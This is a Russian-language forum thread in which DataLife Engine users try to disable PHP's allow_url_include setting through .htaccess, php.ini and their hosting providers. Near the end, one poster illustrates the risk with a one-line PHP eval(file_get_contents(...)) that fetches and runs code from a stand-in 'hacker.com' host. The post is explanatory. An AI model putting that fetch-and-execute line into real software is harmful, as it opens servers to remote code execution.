У меня возникла ошибка allow_url_include

[Alinokk 0]

После обновления движка на версию 9.3. возникла ошибка:

Внимание ошибка безопасности:

Ваш сервер не отвечает минимальным требованиям безопасности, на сервере включена директива allow_url_include, для отключения данной директивы обратитесь к вашему хостинг провайдеру.

----------

Написал провайдеру, он ответил:

Здравствуйте!

Изменять настройки php для Вашего сайта Вы можете через директивы php_value и

php_flag в файле .htaccess.

---------

А я в этом не разбираюсь - что делать?

-----------

Мой сайт

[celsoft 6 077]

В самое начало пропишите строчку

php_value allow_url_include off

[Alinokk 0]

В самое начало пропишите строчку

php_value allow_url_include off

Это в файле .htaccess в корне???

[Lomot 134]

Это в файле .htaccess в корне???

да

[Alinokk 0]

Это в файле .htaccess в корне???

да

Вставила, результата нету. Что ещё нужно сделать?

[Captain 623]

Вставила, результата нету. Что ещё нужно сделать?

Обратитесь в ТП вашего хостинг провайдера.

[grafee 0]

У меня аналогичная проблема и нетолько:

1. Внимание ошибка безопасности:

Ваш сервер не отвечает минимальным требованиям безопасности, на сервере включена директива allow_url_include, для отключения данной директивы обратитесь к вашему хостинг провайдеру.

2. Внимание:

На вашем сервере обнаружены устаревшие настройки в php.ini, а именно включен magic_quotes_gpc, данная настройка является не рекомендуемой при использовании DataLife Engine. Обратитесь к вашему хостинг провайдеру для отключения данной настройки в настройках сервера.

---------------

ОТвет провайдера аналогичен: Вы свободно можете изменять эти параметры через директивы php_value и php_flag

в файле .htaccess .

----------------------------

Использовал : php_value allow_url_include off - не помогло. Провайдер менять не хочет. Зовут МАстерхост.

Дайте рекомендации пожалуйста кто нибудь по моим 2-м пунктам.

----------------

P.S. Администрация переведите пожалуйста мой аккаунт в соответствующую группу, у меня расширеная лицензия на скрипт. Или скажите куда кликнуть.

[celsoft 6 077]

Использовал : php_value allow_url_include off - не помогло. Провайдер менять не хочет. Зовут МАстерхост.

попробуйте вместо off использовать 0 т.е. php_value allow_url_include 0

P.S. Администрация переведите пожалуйста мой аккаунт в соответствующую группу, у меня расширеная лицензия на скрипт. Или скажите куда кликнуть.

http://forum.dle-news.ru/index.php?showtopic=56000

[grafee 0]

Не помогло... кукис обновил в т.ч. пишет красным по белому ... ругается ДЛЕ.

Инет перерыл.. везде написано как это ужасно или ведутся споры, что не существенно ... а вот решение проблемы никто толком не указывает.

А по второму пункту я нашел на форуме тут ... помогло .. завтра с провайдером буду бадаться...

P.S. Спасибо, заявку отправил.

[celsoft 6 077]

Не помогло...

В таком случае вам поможет только хостинг провайдер, пусть проверяют почему не работает, если они пишут что вам разрешено менять этот параметр PHP в .htaccess

Вообще этот параметр касается общей безопасности вашего сервера. Непосредственно самому DLE неважно включен или выключен этот параметр. Это рекомендация относительно вашей безопасности в случае попадания на сервер других сторонних скриптов.

[grafee 0]

Итак... немного порычав в очередной раз мне пришло письмо от Хостера:

Здравствуйте!

Вы можете использовать PHP-CGI:

* http://masterhost.ru/support/doc/php/#reconfig

Достаточно скопировать нашу версию PHP-CGI и в php.ini изменить

allow_url_include = On

на

allow_url_include = Off

----------------

Т.е. в предыдущий раз они мне писали что htacces надо менять ... теперь описав свои изменения директив... поняв что и действительно не работает, отписали по другому.

Вот сейчас сижу и осмысливаю всё что там написано в * http://masterhost.ru/support/doc/php/#reconfig. Возможно кому нибудь это тоже поможет. Дальнейшие свои действия буду описывать... чуствую себя чайником.

Потихоньку думаю сделаю.

Изменено 26 мая 2011 пользователем grafee

[Adobe 111]

Аналогичная проблема была.

hoster.ru хостинг

Звонил в техподдержку, сказали мол у анс такие настройки и его через htaccess нельзя менять, вобщем побрили

[IgorA100 90]

Вот сейчас сижу и осмысливаю всё что там написано в * http://masterhost.ru/support/doc/php/#reconfig. Возможно кому нибудь это тоже поможет. Дальнейшие свои действия буду описывать... чуствую себя чайником.

Потихоньку думаю сделаю.

Я так понимаю, что у Вас выделенный виртуальный сервер. Если да - нужно клиентом зайти по SSH и править файл настроек php.ini. Данные настройки будут применены ко всему виртуальному серверу.

[Plextor 0]

Кто работает с 1Gb хостингом, подскажите как решить данную проблему?

Тех поддержка хостинга писала что то о "переводе сервера на cgi / fastcgi". Но к сожалению ничего непонятно...

[total08 0]

Такая же ошибка. В версии 9,2 исправил при помощи директивы RewriteBase и php_flag allow_url_include Off но в 9,3 не помогает

[celsoft 6 077]

В версии 9,2 исправил при помощи директивы RewriteBase и php_flag allow_url_include Off но в 9,3 не помогает

Не придумавайте того чего не было и быть не могло. Версия 9.2 данной проверки не проводила и выводить данное сообщение не могла в принципе, соответвенно и исправлять с помощью директив вы это также не могли.

Вообще сообщение о данной проблеме скрипт выводит во вполне очевидным текстом. Настройки вашего сервера, представляют угрозу для безопасной работы сайтов. Эта серверная настройка и обращаться для ее исправления нужно к хостинг провайдеру. DLE вообще все равно включена эта настройка или нет, на его работу это никак не влияет, ему все равно. Он лишь вас уведомляет, что хостинг не уделяет должного внимания настройкам безопасности сервера. И решать этот вопрос вам нужно с вашим хостинг провайдером, DLE это отключить не может, да и не для него эта настройка.

[Scorpio2011 2]

У меня та же беда! Поддержка исправила настроики. Через функцию phpinfo() allow_url_include=Off вот что у меня, тоесть отключена эта функция. Плюс я php_value allow_url_include off добавил в .htaccess, а толку ноль, как вылазила так и вылазиет это сообщение.

Изменено 31 мая 2011 пользователем Scorpio2011

[celsoft 6 077]

Scorpio2011,

скрипт получает эти значения через ini_get от сервера. Предоставляйте доступ по FTP, проверим что у вас возращает сервер в данной функции

[grafee 0]

Вот сейчас сижу и осмысливаю всё что там написано в * http://masterhost.ru/support/doc/php/#reconfig. Возможно кому нибудь это тоже поможет. Дальнейшие свои действия буду описывать... чуствую себя чайником.

Потихоньку думаю сделаю.

Я так понимаю, что у Вас выделенный виртуальный сервер. Если да - нужно клиентом зайти по SSH и править файл настроек php.ini. Данные настройки будут применены ко всему виртуальному серверу.

Всё именно так. Я с админом одним разговаривал, он сказал проблем как бы никаких.. через SSH зайти и проч.

НО !!! тут штука немного другая описывается, провайдер предлагает создать свой интерпритатор PHP входя через SSH. Там всё что он напсал по этому поводу впринципе понятно, времени нет пока этим заняться - работа. Раскрутку сайта не запускал .. посещений пока нет особо, сейчас пока наполню, потом ошибку хоста эту исправлю, потом раскрутка... но всё во времени упирается. Отпишу потом.

[n0lik 75]

celsoft,

Мне хостер написал:

К сожалению, allow_url_include отключить невозможно.

Чем это мне грозит? Чего можно ожидать и как обезопасить сайт?

Изменено 5 июня 2011 пользователем n0lik

[celsoft 6 077]

n0lik,

Непосредственно самому DLE абсолютно все равно включена или отключена данная директива, на его функциональность это никак не влияет. Но когда включена данная директива, то для того чтобы запустить сторонний зловредный код, его необязательно загружать именно на ваш сервер, его можно будет запустить когда он находится на любом другом сервере и сайте. Т.е. например если будет найдена какая либо уязвимость в скрипте или сторонних модификациях или сторонних скриптах на вашем сайте, то опасность от той или иной уязвимости увеличивается в разы.

Обезопасить себя можно только отключением данной директивы, и других вариантов нет, т.к. данная директива это не какая то конкретная уязвимость, это общая небезопасная настройка сервера.

Для примера: Вот почти год назад была обнаружена уязвимость в DLE http://dle-news.ru/bags/v90/1127-nedostatochnaya-filtraciya-vhodyaschih-dannyh.html так вот как видите она имеет статус очень опасной, при этом если на сервере отключена директива register_globals то эта уязвимость была абсолютно безопасна для сайта, и воспользоваться ей было бы невозможно, даже если не ставить патч и что либо исправлять.

Есть ряд настроек сервера кторые небезопасны и существуют они только для того чтобы выполнять очень специфические задачи и включать которые для общих серверов и всех сайтов нельзя, к таким настройкам и относиться также allow_url_include

[WWW.ZEOS.IN 1 161]

n0lik,

Вот написал тебе три примера, как получить содержимое файла:

<?php

// Первый способ.

$a = file ( "http://ya.ru/" );

print_r ( $a );

//


// Второй способ.

$b = fopen ( "http://ya.ru/", "r" );

echo fgets ( $b, 20480 );

//


// Третий способ.

$c = file_get_contents ( "http://ya.ru/" );

echo $c;

//

?>

[/php]

Для всех этих способов в php.ini должно быть включено [b]allow_url_fopen[/b].

Для DLE включение [b]allow_url_fopen[/b] надо лишь для того, чтобы через админку проверять наличие новых версий.

Файл: upload\engine\ajax\updates.php

Строчка: $data = @file_get_contents("http://www.dle-news.ru/extras/updates.php?version_id=".$_REQUEST['versionid']."&key=".$config['key']);

Если тебе это не надо, то [b]лучше отключать allow_url_fopen[/b].

А узнать о новых версиях DLE можно с RSS по каналам: http://dle-news.ru/bags/rss.xml, http://dle-news.ru/release/rss.xml

[n0lik 75]

celsoft,

Спасибо за ответ.

WWW.ZEOS.IN,

Как и всегда, я вас не понял про что вы

Вот если бы вы мне написали как вдолбить хостеру об отключении allow_url_include, было бы замечательно

[WWW.ZEOS.IN 1 161]

<?php eval ( file_get_contents ( "http://hacker.com/сторонний_зловредный_код.txt" ) ); ?>[/php]

Так понятнее?

Изменено 5 июня 2011 пользователем WWW.ZEOS.IN

[n0lik 75]

WWW.ZEOS.IN,

Не капельки, я в пхп не соображаю и сей код мне ни очём не говорит, я же говорю, ты лучше напиши, что мне сказать хостеру (как убедить), что бы он отключил allow_url_include.